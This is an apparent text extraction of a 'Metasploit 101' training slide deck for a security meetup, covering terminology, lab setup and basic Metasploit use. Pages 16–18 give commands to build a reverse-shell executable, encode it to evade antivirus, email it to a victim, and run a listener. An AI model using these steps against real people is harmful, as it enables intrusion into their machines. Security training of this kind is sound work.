Please tick the box to continue:

Page 1: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting


MSF 101

By -: Arvind Sharma

(Moderator Hcon Delhi)

Page 2: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

About Me

• Security Enthusiast

• Works at

• Works For Hcon Group &• Works For Hcon Group &

• Python coder

• Few More I will add in next meet ;)

Page 3: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Topics to be covered

• Understanding basic terminologies

• Exploiting the vulnerability manually

• What is MSF( Metasploit ) & why needed• What is MSF( Metasploit ) & why needed

• Brief History and Introduction

• Lab requirements , creation and pre-requisite for testing

• Basic Exploitation of Windows XP & Metasploitable

Note : This is not the end this is just the beginning , detail in next meets

Page 4: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Basic Terminologies

• Vulnerability : Weakness in System (Ex: Buffer Overflow , memory leaks etc.


• Exploit : Security Attack on the Vulnerability (Ex: Attacker use BOF to

execute his own code )execute his own code )

• Payload : Sequence of code that is executed when vulnerability is


• Shell codes : Shell payloads which provides interactive shell to control

compromise system

• Encoder : A software which converts a piece of code into another form

• Auxillary : Code’s other than exploits and vulnerability

• Session : Successful connection after exploitation

Page 5: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Lets find some vulnerability and exploit it manually

• Vulnerable Free Float FTP Server V 1.0 on Windows XP ( netapi too)

• Finding Public Exploit ( I prefer Python one )

• Crashing The Free Float FTP Server• Crashing The Free Float FTP Server

• Execution of shell code yes/no/why if no ?

• Vulnerable ssh on metasploitable 2

• Finding Public Exploit

• Exploiting vulnerable ssh

Page 6: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Place for Finding Public Exploits

Might be more but these

serves the purpose

Page 7: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Scanning and enumerating the services

Note : Yellow Marked are vulnerable services

Page 8: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Exploiting the vulnerabilities using public exploits

Page 9: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

So you saw working with public exploits creates a hectic situation Now here comes my SN1P3R Now here comes my SN1P3R


Page 10: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

MSF Overview• Metasploit Framework is a open source which provides

following features

• Information Gathering& Fingerprinting

• Exploit Development / Penetration Testing

• Payload creation and Encoding• Payload creation and Encoding

• Fuzzing ( use to test for app vulnerabilities ) etc

• Originally written in perl language by HD Moore for game

playing in network testing afterwards completely ported into

Ruby language.

• Now it is maintained by Rapid7 from 2009

Page 11: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Metasploit Directory Structure

root@bt:cd /pentest/exploits/framework2/

data lib exploits payloads encoders auxillary

Note: Few more are there but these are important ones

Page 12: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Interfaces provided by MSF

• Console ( root@bt: msfconsole )

• CLI ( msfcli


• Web• Web


• Armitage

Page 13: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Demo of Different modes of opening and accessing MSF Console

(On Backtrack 5 R3)

• Using Backtrack Menu

Backtrack->Exploitation Tools->Network

Exploitation Tools-> Metasploit


• Using Directory traversal

root@bt: cd


root@bt: ./msfconsole

• Directly through terminal

root@bt: msfconsole

Page 14: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Basic Exploitation Technique

Open Port Scan+Version Scan

Open Port and Service version


Exploit the Vulnerability

Get Full Control

Page 15: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Basic Commands of Metasploit Framework

• ? Or help -> Help Menu

• search < keyword > ->for searching the module

• use exploit/[Path] -> for using the exploit

• set PAYLOAD [path] -> specifying payload to be used

• show options -> to show options for current module

• set [option] [value] -> to set the values required for module

• exploit -> start the exploit• exploit -> start the exploit

Few Meterpreter Commands

• shell -> drops you to the shell prompt of compromised


• ps -> shows pid’s of running processes

• migrate [pid] -> migrate to different process

Note: For more commands and their description get the MSF cheat sheet

Page 16: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Using msfpayload and msfencode tools of MSF

• msfpayload -> used for shell code generation also for creating executables

from metasploit payload

Syntax : msfpayload [options] [var=val] >[S ummary [P]erl…………

example :

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444

X > Desktop/payload.exe

• Msfencode -> another tool in msf used for encoding the payloads to decrease

the detection level

Example :

msfencode –t exe –x Desktop/payload.exe –k –o Desktop/encoded_payload.exe

–e x86/shikata_ga_nai 5

Note : More Detail will be in MSF 101 part 2 in next meet

Page 17: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

After creating payload what should be done ?

exe payload + compress -> mail to victim -> victim execute -> boom

Page 18: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Creating a Listener for our exe payload

• Open msf and use multi/handler which is a stub program that

handles exploits launched outside of framework

msf > use exploit/multi/handler

• After using multi/handler we have to tell msf for which payload it • After using multi/handler we have to tell msf for which payload it

has to listen

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > show options ( set the LHOST and LPORT )

msf > set LHOST

msf > set LPORT 4444

Note : Now your listener is ready for meterpreter session

Page 19: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Lab Requirement and Creation of Lab for testing


1. Virtualization Software ( Virtual Box , Vmware etc )

2. ISO Image of different OS like Windows XP , Backtrack, Metasploitable

3. Your Brain

Creation of Lab in my way :-Creation of Lab in my way :-

• I prefer Virtual Box , why ? Because its free and also takes less space

• For Communication between the Virtual machines I create internal

network of VM’s with DHCP server on. Thus no need to set IP


• Tests the things in internal network mode

• How to create DHCP Server and internal network go like this ……


Page 20: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Lab Creation

Page 21: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

Lab Creation

Page 22: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting
Page 23: Arvind Sharma - Metasploit 101 Part 1 - to be covered • Understanding basic terminologies • Exploiting

How to defense and detect meterpreter session and kill it

Related Documents